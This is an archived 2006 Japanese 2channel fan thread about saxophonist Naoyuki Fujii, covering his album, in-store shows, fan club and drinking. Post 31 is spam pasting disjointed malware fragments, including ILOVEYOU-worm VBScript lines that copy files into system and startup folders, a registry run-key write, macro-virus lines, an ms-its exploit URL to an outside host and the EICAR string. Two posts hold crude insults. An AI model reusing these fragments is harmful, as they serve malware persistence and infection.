2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【郁弥の】藤井尚之【弟】

1 :NO MUSIC NO NAME:2006/06/04(日) 21:35:04 ID:ZJeCrlr+
なかったんで立てました。
2ch初心者ですがよろしく

2 :NO MUSIC NO NAME:2006/06/05(月) 00:27:05 ID:OWcSaJuL
7日にアルバム出すそうですね。

3 :NO MUSIC NO NAME:2006/06/05(月) 00:34:31 ID:uVwEPWc4
そうみたいですね
出すのはいいんですが、売れるのか心配、、

4 :NO MUSIC NO NAME:2006/06/08(木) 22:41:40 ID:rMPRmKly
歌ってるの?

5 :NO MUSIC NO NAME:2006/06/09(金) 02:14:42 ID:pMZKXy0f
初日にアルバム買ってインストのチケットも入手しましたよ。

今回は12曲中11曲歌ってるよ。
兄作詞が三曲、他にも兄のアルバムで良くみる名前がチラホラ。
豪ちゃんもメンバー。


結構イイ曲。ゆるり ふわりと滲みゆく空と愛なんてをヘビロテで聴いてる。

6 :NO MUSIC NO NAME:2006/06/09(金) 06:47:09 ID:gmRCXVY4
初登場何位か知ってる人いたら教えてくだされorz
上位にいることを願う。

7 :NO MUSIC NO NAME:2006/06/11(日) 15:41:38 ID:imDpwluQ
ageますよ

8 :NO MUSIC NO NAME:2006/06/12(月) 20:02:31 ID:ZyJ9r19m
>>6
初登場じゃないが、タワレコでは6位だったよ。インディーズチャート

9 :NO MUSIC NO NAME:2006/06/13(火) 16:37:30 ID:ZA2sTcaA
インディーズか、、
所詮インディーズなのか、、

10 :NO MUSIC NO NAME:2006/06/18(日) 20:17:44 ID:4kUALFWa
ナイナイサイズ出てましたね。
お兄ちゃんはメジャーレーベルなんでしょうね・・・。

DEF TECKとかもインディーズなんで、メジャーじゃなくてもいいと思うけど。

11 :NO MUSIC NO NAME:2006/06/19(月) 18:06:43 ID:Se4HIvuG
デフテクもインディーズなんだぁ。
じゃ6位とか、なかなかやるじゃないかww

12 :NO MUSIC NO NAME:2006/06/20(火) 00:13:09 ID:QwUGFkU5
インディーズでも、発行枚数違うんじゃ・・・。

レコード店限定のインディーズチャート6位とかが、なかなかやるのかって言うと、どうだろう。

13 :NO MUSIC NO NAME:2006/06/21(水) 12:52:51 ID:G5s5To3e
尚之はインディーズのほうが「らしく」ていいんじゃない?
つか、尚之自身のレーベルだし
久々の歌アルバムだからかもだが
かなり気に入ってる>ゆるり

9月の恵比寿楽しみ(`・ω・´)

14 :NO MUSIC NO NAME:2006/06/23(金) 02:50:54 ID:YayBdge6
インストアライブ行く人いるー?
私は渋谷のに行くけど、アルバム曲だけかな、歌うの

15 :NO MUSIC NO NAME:2006/06/25(日) 01:13:06 ID:6PFeUFFp
下がってるからage w 
FUNじゃないけど・・・明日は名古屋のインストだよね
行く人レポよろ

16 :あぼーん:あぼーん
あぼーん

17 :NO MUSIC NO NAME:2006/06/26(月) 20:00:21 ID:Y2Uv3+dc
age

18 :NO MUSIC NO NAME:2006/06/28(水) 05:08:52 ID:8sxdHCzZ
尚之のファンクラブに入ろうと思って
申込書を取り寄せ
郵便局に申込書を出したんだが、、
いつくるんでしょう?
もう一ヵ月くらいなんだが、、
大体どれくらいでくるの?

19 :NO MUSIC NO NAME:2006/06/28(水) 16:10:19 ID:wGqpit9B
>>18
私はフミヤのFFに入会してるけど(Bareは今年入会予定)
3月・6月・9月・12月の三か月置きに会報くるよ。
だから、9月くらいじゃない?


20 :NO MUSIC NO NAME:2006/06/28(水) 18:53:54 ID:8sxdHCzZ
19
情報サンクス。
入会特典とか尚之HPとかも会報くる時と一緒?

21 :19:2006/06/28(水) 21:32:36 ID:wGqpit9B
>>20
多分そうだとオモ。
HPについては会報に書いてあるから。

22 :ショボーン:2006/06/29(木) 07:29:09 ID:FoSB0Q6c
PCからこのスレだけ読み込めなくなったんだが
>14の変なスクリプトが原因?

23 :NO MUSIC NO NAME:2006/06/29(木) 10:38:03 ID:t8Vf0gme
>>22
そうだとオモ。>>16 だけどね

24 :NO MUSIC NO NAME:2006/06/30(金) 01:54:46 ID:SV4v9v/t
今日のディアモールの模様後半
個別には落とせません(riknaは除いています)
事情で別のアーチストも含んでいます

25 :NO MUSIC NO NAME:2006/07/01(土) 21:13:43 ID:ZYyc/cJe
Non Chordsカッケー!
本人も緊張しつつ楽しそうでイイ!

26 :NO MUSIC NO NAME:2006/07/02(日) 11:59:51 ID:yNqLphZL
今日は渋谷でインストだね。
私は行くけど、他にも行く人居るのかな

27 :NO MUSIC NO NAME:2006/07/02(日) 23:23:52 ID:NpsCeIdr
尚ちゃんの少年ぽさが好きです。
見た目、ちょっとおじさんぽくなっちゃったけど、
今もいい味出してると思います。

28 :NO MUSIC NO NAME:2006/07/03(月) 23:43:02 ID:/okQy00o
18才〜22才の頃の尚ちゃん、夢に出てきて下され。

29 :NO MUSIC NO NAME:2006/07/04(火) 22:03:29 ID:wXLRH/AO
今日は、尚ちゃんの懐かし映像が沢山観られた。
サックスを吹いてる尚ちゃんは、とてもセクシーだった。

30 :NO MUSIC NO NAME:2006/07/05(水) 18:50:35 ID:AsSIFwDH
尚之のサックスになりたい

31 :NO MUSIC NO NAME:2006/07/06(木) 08:10:31 ID:UEV1czv2
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

32 :NO MUSIC NO NAME:2006/07/06(木) 18:37:32 ID:Ktw8Ohub
尚之さん

33 :NO MUSIC NO NAME:2006/07/07(金) 15:23:25 ID:tfgQR59H
>>31
またかよ orz
しつこいよ

34 :sage:2006/07/11(火) 19:44:37 ID:gnfAFcHE
インストア何やったんすか?

35 :NO MUSIC NO NAME:2006/07/12(水) 00:13:07 ID:OVxnpdL8
尚ちゃんの昔のアルバムの『教祖誕生』って知ってる?

36 :NO MUSIC NO NAME:2006/07/12(水) 03:12:30 ID:2unRXqoY
>>34
バニラブルー
ゆるり ふわり
愛なんて
モンスター
単純な風
GOIN'HOME
の六曲だよ

37 :NO MUSIC NO NAME:2006/07/12(水) 03:15:03 ID:2unRXqoY
>>35
持ってるよ、尚オタなら知ってるでしょ

38 :NO MUSIC NO NAME:2006/07/17(月) 23:27:22 ID:uGbiVPrw
尚ちゃんage

39 :NO MUSIC NO NAME:2006/07/18(火) 22:16:53 ID:4nki7Zud
足が多少短くても、尚ちゃんが好き。

40 :NO MUSIC NO NAME:2006/07/19(水) 01:14:11 ID:NyFW9G1E
>>35
ビ−トたけしさんや玉置浩二さん出演の、同名映画のサントラですよね。
玉置さんが、このサントラを絶賛されていました。


41 :NO MUSIC NO NAME:2006/07/21(金) 07:52:26 ID:h9sswM+D
尚之、尚ちゃん、尚タソ、
いっぱいいろんな呼び方で名前を呼びたい。

42 :NO MUSIC NO NAME:2006/07/22(土) 02:20:34 ID:OiS/urf5
尚ちゃんは、はにわ顔

43 :NO MUSIC NO NAME:2006/07/23(日) 02:48:29 ID:De4/HnYK
郁弥の弟、っていうのは、
もう外してもいいと思う。

44 :NO MUSIC NO NAME:2006/07/24(月) 17:30:14 ID:+ZDZ73zh
バニラブルーて聞くと、昔のカップアイスを思い出す。

45 :NO MUSIC NO NAME:2006/07/25(火) 04:04:57 ID:pSssUoy3
尚のサックスになりたい

46 :NO MUSIC NO NAME:2006/07/25(火) 07:32:47 ID:6IZknIRn
ここの流れが尚への一言日記のようで好きだw

47 :NO MUSIC NO NAME:2006/07/25(火) 11:30:22 ID:T8tDLe5c
尚ちゃんの鳩胸…なんか好き

48 :NO MUSIC NO NAME:2006/07/26(水) 00:32:19 ID:XSEwRdo2
な〜お〜ゆ〜き〜さぁん

ちょっと呼んでみただけ♪

49 :NO MUSIC NO NAME:2006/07/26(水) 02:16:01 ID:URuhnnRB
問・好きなソロアルバムを3つ答えよ

50 :NO MUSIC NO NAME:2006/07/26(水) 22:08:55 ID:ds/Nn9Db
>>49
今は ゆるりふわり な気分
唄えはしないがカナーリ聞いてる

51 :NO MUSIC NO NAME:2006/07/27(木) 03:15:44 ID:Yxgq+v3s
尚ちゃんは、どんな夢をみてるのかな。

52 :NO MUSIC NO NAME:2006/07/28(金) 02:29:58 ID:yuctAOEZ
尚ちゃんに出会えただけで
あたしの人生は 相当
HAPPYなんだよ

53 :NO MUSIC NO NAME:2006/07/29(土) 01:23:11 ID:LJAsWv19
いつでも どんな時でも
尚の事を考えながら
生きている

54 :NO MUSIC NO NAME:2006/07/30(日) 01:20:43 ID:SPcqBFfH
お酒ばっかり飲み過ぎないで、ずうっと健康で
長生きしてほしい。

55 :NO MUSIC NO NAME:2006/07/30(日) 22:28:53 ID:ynNB0OVw
物凄く遅くなったが、>>1さん乙です。
お礼といっちゃ何ですが、↓を…

ttp://www.youtube.com/watch?v=fhsG19AcsmE

56 :NO MUSIC NO NAME:2006/07/30(日) 22:43:12 ID:QKWi0SOE
>>55
あんたぁ神

57 :NO MUSIC NO NAME:2006/07/31(月) 02:57:14 ID:VlR6Wa7r
>>54
あぶらまつりでガバガバビール呑んでたよ、焼き鳥焼きながら

58 :NO MUSIC NO NAME:2006/07/31(月) 03:21:13 ID:QD5auvZI
尚ちゃん、お疲れ様でした☆
後は、9月のライブに向けて頑張って下さいね。

59 :NO MUSIC NO NAME:2006/08/01(火) 01:34:24 ID:j1VLJBEx
夜、寝る前にはいつも
尚ちゃんの事を考えるよ

60 :NO MUSIC NO NAME:2006/08/02(水) 01:53:50 ID:wHaTytDb
昨日は、「ぱちんこチェッカーズ」を打って、
懐かしい尚ちゃんの映像をみたよ。
尚ちゃんの髪型の変遷はすごいな〜
ロン毛も超短髪も
みんなかっこいいですね♪

61 :NO MUSIC NO NAME:2006/08/03(木) 00:59:33 ID:TgoA+2u0
尚ちゃんのサックスの音色にうっとり。

62 :NO MUSIC NO NAME:2006/08/04(金) 00:46:15 ID:4q5Znu/r
実は、私の主治医の先生(37才)が、尚ちゃんに似ていて、
医者に行く日はちょっとドキドキしてしまう。

63 :NO MUSIC NO NAME:2006/08/05(土) 22:07:28 ID:/elMaL3r
たまにはageてみよう。

64 :NO MUSIC NO NAME:2006/08/07(月) 09:35:46 ID:6wsTypLp
尚ちゃんて外見はともかく、あんまり変わらないよね。
シャイなとことか。

65 :NO MUSIC NO NAME:2006/08/09(水) 03:42:11 ID:8zukxq4m
尚ちゃんの夢みて目が覚めた。

66 :NO MUSIC NO NAME:2006/08/11(金) 21:29:33 ID:wDb6QR1A
たまにはage

67 :NO MUSIC NO NAME:2006/08/12(土) 03:02:55 ID:WclXYmq5
尚ちゃんいつまでもカッコイイな

68 :NO MUSIC NO NAME:2006/08/12(土) 11:03:41 ID:ytoFry7o
>>67 禿同!
いつまでもかっこいいよ!

69 :NO MUSIC NO NAME:2006/08/13(日) 06:05:36 ID:TkXtkWCe
尚ちゃん、夏休みの宿題、
ちゃんとやってるかな?

70 :NO MUSIC NO NAME:2006/08/16(水) 01:43:47 ID:Wfefdhw8
尚ちゃんて、柴犬みたいな顔してるよね。

71 :NO MUSIC NO NAME:2006/08/19(土) 03:19:47 ID:v8SbmNId
不定期age

72 :NO MUSIC NO NAME:2006/08/20(日) 01:58:11 ID:T9dpAuou
流れる雲に〜君の笑顔を〜思い出しては〜空がにじんでく〜         この歌を初めて聞いた時、マジ泣きしました    尚ちゃん、逝かないで〜

73 :NO MUSIC NO NAME:2006/08/20(日) 07:48:59 ID:dmNnoYNy
>>72 とにかく休肝日を作ってくれないと心配だ。
最近、なんだか痩せて来たし...

74 :NO MUSIC NO NAME:2006/08/20(日) 21:28:21 ID:3LUTs9HY
お父様は何で亡くなったんだっけ?

75 :NO MUSIC NO NAME:2006/08/20(日) 23:29:42 ID:+FYUxM2Y
癌だったような気がする。

76 :NO MUSIC NO NAME:2006/08/21(月) 01:26:28 ID:dqCwSBpX
寝食を忘れて職人モードに入ってそうだから、そのせいならいいけど。
フミヤが人間ドッグ行ってるから、尚も多分行ってるとは思うけど
頼むから摂生しておくれ〜。

77 :NO MUSIC NO NAME:2006/08/21(月) 05:27:02 ID:QVuJcTit
尚ちゃんいつまでも元気でいてほしい…

78 :NO MUSIC NO NAME:2006/08/22(火) 03:47:31 ID:a7F1OCYX
酒さえ あんなに浴びるほど飲まなけりゃ、
なんとかなると思うんだけど。
てか、嫁は何をやっているんだ?

79 :NO MUSIC NO NAME:2006/08/22(火) 10:51:46 ID:6zr10YqW
結婚したらいきなり酒量が減るんかい。
尚ヲタは何でも人のせいにするのな。

80 :NO MUSIC NO NAME:2006/08/23(水) 11:58:54 ID:SZQK3BzG
41歳って、本厄だっけ?後厄だっけ?
早く、厄を抜けて欲しい。

なんか、尚ちゃんて自分の健康に無頓着そうで
心配だよ...

81 :NO MUSIC NO NAME:2006/08/23(水) 21:59:20 ID:FRshLP3R
今年が本厄じゃね?

男が結婚してから痩せると、>>78みたいに言われるんだよ。
ダンナが独身時代に太っていた場合は別だけど。

82 :NO MUSIC NO NAME:2006/08/24(木) 03:33:22 ID:wJfMhqc7
尚ちゃん、天然だもんなぁ〜。
音楽ヲタクっぽいし。

浮き世の事も少し考えて欲しいよ。

83 :NO MUSIC NO NAME:2006/08/24(木) 04:48:30 ID:zDFyJCoR
尚ちゃんマイペース過ぎ。でも好き…

84 :NO MUSIC NO NAME:2006/08/24(木) 21:39:40 ID:9da9ioNN
意外と現実的だと思うけどね。
いろいろあっても自分のペースは乱さないと決めている
感じがする・・・。

85 :NO MUSIC NO NAME:2006/08/25(金) 01:55:40 ID:/Zs2nkRS
意外と、難しい事は何も考えないで生きていたり。

まあ、尚タンらしく、元気で楽しく毎日を過ごしていってくれたら
私はそれでいいや。

86 :NO MUSIC NO NAME:2006/08/25(金) 17:31:24 ID:FU9O3bSr
いまMXテレビ出てるね(^-^) 誰か見てませんか?

87 :NO MUSIC NO NAME:2006/08/25(金) 19:40:07 ID:O8Fo0zW8
ゴミついてる奴は氏んだ方がいいと思うよ

88 :NO MUSIC NO NAME:2006/08/26(土) 00:27:23 ID:sTSrft5p
尚ちゃん、愛してる。

89 :NO MUSIC NO NAME:2006/08/26(土) 21:40:42 ID:GRrI3gNN
兄ライブで尚ソロのチケ売ってた。
あと何日もないのに・゜・(ノД`)・゜

90 :NO MUSIC NO NAME:2006/08/26(土) 23:14:37 ID:Sxzzhb/H
はじめてここ見た。
尚ファンはみんなアッチに集っているものだと思い込んでいた。

つーか、このスレタイってどうなの?
尚ファンじゃない人がが立てたってすぐ分かるよね。
別にいいんだけどさ。

91 :NO MUSIC NO NAME:2006/08/27(日) 03:08:55 ID:rbZT1eiP
>>90 確かに、尚ちゃんが、
一番言われたくない例えだろうね...
もう、気にしていないかな?
まあ、次からは変えればいいんじゃない?

92 :名無しさん@お腹いっぱい。:2006/08/27(日) 11:12:54 ID:5eZDq/zZ
事実だからいい加減気にしてないかもな。
周りが思っているだけで。

93 :NO MUSIC NO NAME:2006/08/27(日) 17:22:19 ID:rbZT1eiP
尚ちゃん、頑張っているかなあ。

94 :NO MUSIC NO NAME:2006/08/30(水) 12:45:48 ID:80UdK5x0
もう9月になるね。
尚ソロライブ、楽しみだ〜♪

95 :NO MUSIC NO NAME:2006/08/31(木) 14:36:00 ID:9FmTVC4d
Live Depo見るまでライブはどうでもいい気持ちだったけど、
急に楽しみになってきだ。
やっぱり好きなんだなぁ。

96 :NO MUSIC NO NAME:2006/09/01(金) 03:29:34 ID:8ErqBB4c
>>95 そうだよ。
好きなんだよ、きっと。

今月は、
尚ちゃん忙しいね。

97 :NO MUSIC NO NAME:2006/09/01(金) 19:11:40 ID:jOjtqFel
尚ちゃん、元気でね!

98 :NO MUSIC NO NAME:2006/09/02(土) 00:47:20 ID:UtVsZs84
また、夜中に起きて
ソファでうたた寝なんかしてないだろうか。
今日は涼しいから、風邪なんかひかないでね
尚ちゃん♪

99 :NO MUSIC NO NAME:2006/09/03(日) 05:53:05 ID:lvSu8bkb
昨日ライブ行ってきた
尚ライブ行くの久々だったんだが
歌もサックスもかなり上手く鳴ってて
いいライブだた

歌詞かみまくりだが憎めないなw

100 :NO MUSIC NO NAME:2006/09/03(日) 17:25:21 ID:SD4SAiGC
>>99 良かったね。
尚ちゃん、Lovely!

101 :NO MUSIC NO NAME:2006/09/03(日) 18:22:45 ID:7GVVygzy
この人って、ホントに去年が初婚?
10年くらい前に自称「妻」と会ったことがあるんだけど・・・
彼女の妄想だったのかな。

102 :NO MUSIC NO NAME:2006/09/03(日) 19:18:33 ID:/dN1dm4H
事実上の妻、というか「同棲相手」なら考えられなくもないが。
今の嫁も6〜7年同棲してたそうだし。

103 :NO MUSIC NO NAME:2006/09/03(日) 22:13:29 ID:SD4SAiGC
尚ちゃんて、そんなに女性と同棲しまくりなの?
キョンしか知らないや...

104 :NO MUSIC NO NAME:2006/09/04(月) 18:26:39 ID:Kh0eTF5r
ソロライブへいった人いないか?
誰かセットリスト頼む。

105 :NO MUSIC NO NAME:2006/09/04(月) 21:00:26 ID:C+Nph5Io
>>104 避難所の尚スレにセットリストとレポ挙がってたよ。

106 :NO MUSIC NO NAME:2006/09/05(火) 14:30:32 ID:BieoIygL
>>101
今現在既婚である以上、
初婚だろうが再婚だろうがたいして変わらないわw

107 :NO MUSIC NO NAME:2006/09/06(水) 01:30:18 ID:mpX3ZBIQ
尚ちゃんは、お兄ちゃんと違って
恋多き男性じゃないよね。
尚ちゃんみたいな人と
結婚したい。

108 :NO MUSIC NO NAME:2006/09/07(木) 02:58:23 ID:gTbfXjrF
本当のアル中になっちゃう前に
お酒を大幅に控えるようにして下さい。
お願いします。

109 :NO MUSIC NO NAME:2006/09/07(木) 15:46:24 ID:KavtCqxo
尚ちゃんはいつまでもカッコイイね!

110 :NO MUSIC NO NAME:2006/09/07(木) 19:54:47 ID:dtSHTpbw
最近は酒の飲みすぎかなんかで痩せすぎて目元がヤバイと思うが・・・・

111 :NO MUSIC NO NAME:2006/09/08(金) 03:39:13 ID:nscQ1UNy
大切にしなきゃと思うものほど
簡単に壊してしまうよ


112 :NO MUSIC NO NAME:2006/09/09(土) 13:09:48 ID:YPNlTgwT
大阪行ってきた。
アンコールまで酒は控えていたようだけど、歌詞とびひどすぎ。
本人が歌いなおしたくらいだもの。
もっとも、今までだったら開き直って歌いなおしはしなかったかも?と
歌いなおしたこと自体に驚いたw

服装のせいかな?一時期ほど痩せていないと思ったけど。


113 :NO MUSIC NO NAME:2006/09/09(土) 21:40:38 ID:+Rl9+UlZ
ベースの方が細すぎて、そんなに細すぎるとは思わなかったけど・・・。

114 :名無しさん@お腹いっぱい。:2006/09/10(日) 00:38:24 ID:FFCE7Vfv
そういやDVDは名古屋を録画するみたいね。
名古屋参加の方、歌詞カードはでたかだけ教えて欲しいなw

115 :NO MUSIC NO NAME:2006/09/10(日) 08:47:46 ID:ix+0MBDt
最後の曲だけ出ました。

116 :NO MUSIC NO NAME:2006/09/10(日) 18:10:42 ID:I7dLnR6B
尚ちゃんは好きだけど
プロ意識が無いと
尊敬はできない。

117 :NO MUSIC NO NAME:2006/09/11(月) 02:30:22 ID:q+j9ScOz
>>116
うわ自分の感じていたモヤモヤはそれだ!!

118 :名無しさん@お腹いっぱい。:2006/09/11(月) 23:46:59 ID:GjdgaS8P
>>115
ありがとう!やっぱ出たかぁ。

歌詞を一言一句間違わないために歌詞カードを見ながら歌うという
プロ意識を示されたらどうする?

119 :NO MUSIC NO NAME:2006/09/12(火) 00:10:20 ID:qyywl2Yb
通りすがりの兄ヲタだが、
サックス屋さんなんだから、堂々と見て唄えば良いと思うんだが。
その方が集中出来るっしょ。

酒に関してはシラン

120 :名無しさん@お腹いっぱい。:2006/09/12(火) 22:08:52 ID:AX0ddNtq
通りすがりの兄ヲタさんに聞くのもなんだが、
兄でも、演出上おかしくない、例えばバラード部門とかなら、
歌詞カードがあってもOK?
カワイイから許すとかそういう感情ではなくて、歌詞を覚えられないなら
ボーカリスト失格っていうのも残念な気がするんだよね。
歌が上手いとは思わないんだけど、歌入りの曲で好きなの多くてさ。

兄ヲタさんに愚痴ってしまったw

121 :NO MUSIC NO NAME:2006/09/13(水) 02:51:26 ID:qnKzm4f1
>>120
本人の歌はカンペなしで唄って欲しいが、
老いの為に記憶装置がダメになってしまった場合は受け入れるしかない。
(実際、見てる人も少なくないらしいしな。)
詰まりまくって歌にならなくなるよりは良いさ。

122 :NO MUSIC NO NAME:2006/09/13(水) 04:35:00 ID:W9NPyelz
いっそ桑田さんみたいにコンピュータと連動して
モニターに歌詞とコード出しておけばいいのに。
きっとかなり金かかるけど。

123 :NO MUSIC NO NAME:2006/09/13(水) 15:02:55 ID:BuPmTnMr
昔から、Perfect!という感じではなく
どっか抜けてるのが
尚ちゃんの持ち味といえば持ち味だからなあ。

演奏の方は、酒さえ入ってなけりゃ、
かなりいい線行ってるし(それで食べているんだし)
歌の方は、オプションという風に考えてみてはどうかな。
たま〜に尚ちゃんから貰える、
嬉しいプレゼントとして受け取ればいいんだよ。

124 :名無しさん@お腹いっぱい。:2006/09/13(水) 23:42:14 ID:4ZKaqNCY
>>121
だよねぇ。歌を歌うために覚える必要があるわけで、
それでも覚えられなきゃ見て歌えばいいよね。

尚タソの場合、努力不足というかひらきなおりというか、甘えらしきものが
見え隠れするから厳しい意見を言いたくなる気持ちもわかる。
これで尚タソを嫌いにならないで欲しいなぁ。

125 :NO MUSIC NO NAME:2006/09/14(木) 04:44:42 ID:KMmko/yF
ふたり寄り添って
温もりを感じて
朝を迎えたい

126 :NO MUSIC NO NAME:2006/09/15(金) 04:44:40 ID:ok/0CGFw
疲れた身体を横たえた時
君の幻がほほえんでくれる

127 :NO MUSIC NO NAME:2006/09/16(土) 01:16:04 ID:anQKxNKY
尚ちゃんの事が好き過ぎて
どうにかなりそうだ。

128 :NO MUSIC NO NAME:2006/09/16(土) 20:44:26 ID:YyL4YaPE
↑今となっては天然記念物

129 :NO MUSIC NO NAME:2006/09/17(日) 02:16:25 ID:IbljWZES
尚ちゃんの事を考えると目眩がする。

130 :NO MUSIC NO NAME:2006/09/17(日) 09:32:36 ID:iULH5/fo
その目眩は
昔の幻とあいまって・・・というほうに1000ロウカ

131 :NO MUSIC NO NAME:2006/09/17(日) 23:34:44 ID:IbljWZES
サックスは、人間の声に一番近い楽器だ、
と聞いた事がある。
声にはならない、尚ちゃんの魂の叫びが聴こえるようだ。

132 :NO MUSIC NO NAME:2006/09/18(月) 02:03:17 ID:NDLXBYMr
尚ちゃんを大好きだと言っている今、16の妹が居るんだがね。
結婚した事に軽くショック受けてたよ、去年。
自分がチェを好きになったのもそのくらいだったなぁ…(遠い目)

133 :NO MUSIC NO NAME:2006/09/18(月) 03:05:26 ID:PwRMvLQW
>>132 16才...バリバリ平成生まれの妹さんですね。
私は、藤井兄と同じ年です...
21才の秋に初めて尚ちゃん(当時18才w)を見て以来のファンです。

尚ちゃんのファンの年齢層、結構広いんですね。

134 :132:2006/09/18(月) 13:49:57 ID:NDLXBYMr
>>133
妹は元々兄オタ(私の影響で)だったんだけど、ここ2〜3年でチェ時代と尚ソロのビデオを集め出して尚ちゃんにドップリハマったらしい。今じゃ兄より尚ちゃんのが好きだってw
平成2年生まれだよ、妹。

この前のゆるり ふわりが初参加で(インストは行ったみたい)興奮して帰ってきたの覚えてるw

油とかもこの前のまつり以外、年齢で参加出来なかったり客のノリについていけないからって参加してなかったけど、若い子は居るんじゃない?
妹は自分より年下を知らないって言ってたけど。



135 :名無しさん@お腹いっぱい。:2006/09/18(月) 15:19:05 ID:5yhlL1F7
若い子、の定義にもよるな。
姉が好きで、っていってくれる職場の子でも24、5だから。
妹さんに、外見なのか中身なのか曲なのか、ちょっと聞いてみたいわ。

136 :133:2006/09/18(月) 15:20:33 ID:PwRMvLQW
>>134 う〜ん、初々しい。
アブログに、16才の女の子の書き込みを見つけたけど、
どうやら尚ちゃんファンらしい。
彼女は、お母さんの影響で、チェ→尚ちゃん のファンになったみたい。
やっぱり、若いファンの子は、
誰かの影響を受けているみたいだね。

137 :NO MUSIC NO NAME:2006/09/18(月) 15:46:14 ID:eWQLDIpG
歳の離れた妹さんの影響でしょうか?
おかしな日本語を使う方が混じってますね。

138 :132:2006/09/18(月) 18:23:14 ID:NDLXBYMr
>>135
最初はルックスからで、後はサックスと歌だって。
最近は面白い人、という認識らしい。

>>136
妹もたまにアブログにカキコしてるよ。
16歳の子居たんだ、後で教えておこう。

>>137
えっと、私?かな。ごめんなさい。


139 :NO MUSIC NO NAME:2006/09/18(月) 18:31:42 ID:PwRMvLQW
>>138 えっと、私の読んだ書き込みが、
あなたの妹さんのような気もしてきた。
お母さんの影響でファンになった書き込みは、
アブログじゃなかったよ。
妹さん、まつりで、
尚ちゃんと喋ってない?
勘違いだったら、ごめんなさいね。

140 :NO MUSIC NO NAME:2006/09/18(月) 19:50:21 ID:NDLXBYMr
>>139
あ、多分それ妹かも知れない。
話したって言ってたから。

141 :NO MUSIC NO NAME:2006/09/18(月) 20:10:45 ID:PwRMvLQW
>>140 やっぱり。結構、
印象強かったので、覚えています。

妹さん、いい思い出ができて、
良かったですね。

142 :NO MUSIC NO NAME:2006/09/18(月) 20:25:44 ID:zakvj16I
その妹さん羨ましい。
尚ちゃんと話した事なんてないや。

あ、ここの人でロッカールームに参加した人居る?


143 :名無しさん@お腹いっぱい。:2006/09/18(月) 21:41:24 ID:YjHx5oLn
>>138
聞いておいて、しかもファンの癖になんですが。
ルックス→サックス&歌→キャラ  かぁ。

20年前はルックスだったな、うんw

144 :NO MUSIC NO NAME:2006/09/18(月) 21:50:18 ID:PwRMvLQW
>>143 私もルックスからだったよ。
一目惚れ、さ。

145 :NO MUSIC NO NAME:2006/09/18(月) 22:44:22 ID:NDLXBYMr
言葉が悪かったかな。
今は昔のルックスより今のルックスのが好きらしいよ。
最近ではゆるり ふわりの時が一番カッコいいって。
尚ちゃんの喋りが、温かくて好きだって、気持ちがポカポカする。って言ってたよ。

尚ちゃんって、癒し系なのかね。

146 :NO MUSIC NO NAME:2006/09/18(月) 22:58:14 ID:PwRMvLQW
>>145 癒し系の要素は
あると思う。

フミタンが、こちらを挑発してくるタイプだから
昔からそんな感じがしてた。

尚ちゃんには、ハラハラさせられる事も多いけどね。
そして、兄弟揃って天然さんだよね。

147 :NO MUSIC NO NAME:2006/09/20(水) 00:57:38 ID:GGasaLSg
>>146
こいつのマンコってかなり臭そう

148 :NO MUSIC NO NAME:2006/09/20(水) 15:51:13 ID:nUbYXu7T
尚ちゃんの昔の映像をいろいろ観た。
チェ時代は髪型をよく変えていて
自分はワンレンの時の尚ちゃんが好きだったけど、
ファイナルの髪型を観たら
あの位が一番似合っている気がする。

それにしても、髪質サラサラなんだなぁ。
綺麗...

149 :NO MUSIC NO NAME:2006/09/20(水) 21:37:00 ID:0VW+nfRh
自分はワンレンをはじめロン毛になるたびに今度こそ
ヲタやめようと思うわけだが、
ファイナル時分が一番、というところが一致するのはなぜでしょうw

150 :NO MUSIC NO NAME:2006/09/21(木) 00:33:32 ID:VQTayTBW
よおく見ると
尚ちゃんにロン毛は

似 合 わ な い。

151 :NO MUSIC NO NAME:2006/09/23(土) 09:02:48 ID:fXLDGe5+
尚ちゃんと えっち してみたい(赤面)

152 :NO MUSIC NO NAME:2006/09/24(日) 02:13:10 ID:h5EjxFFk
自分は既に脳内で

153 :NO MUSIC NO NAME:2006/09/25(月) 01:31:49 ID:5KusesKr
えっちまでいかなくていいから、抱きしめてもらいたい。

154 :NO MUSIC NO NAME:2006/09/27(水) 00:53:15 ID:TPnT8BqF
尚ちゃんが幸せなら
それでもいいかなあ。

155 :NO MUSIC NO NAME:2006/09/28(木) 00:21:04 ID:tosxRM+I
尚は一生、兄のコバンザメとして生きて行くのか。

156 :NO MUSIC NO NAME:2006/09/28(木) 06:14:21 ID:bBCPpzYT
>>155 尚ちゃんは、フミヤさんのコバンザメではないと思うけどなあ。
いや、いろんな意味で
お世話にはなってるとは思うけど。

157 :NO MUSIC NO NAME:2006/09/28(木) 08:34:43 ID:PAqFiszL
>>155や世間がコバンザメと思っていても
私には兄=スペシャルゴージャスオプションですから。

158 :NO MUSIC NO NAME:2006/09/29(金) 20:59:08 ID:MOXXiLx8
>>157
ハゲド

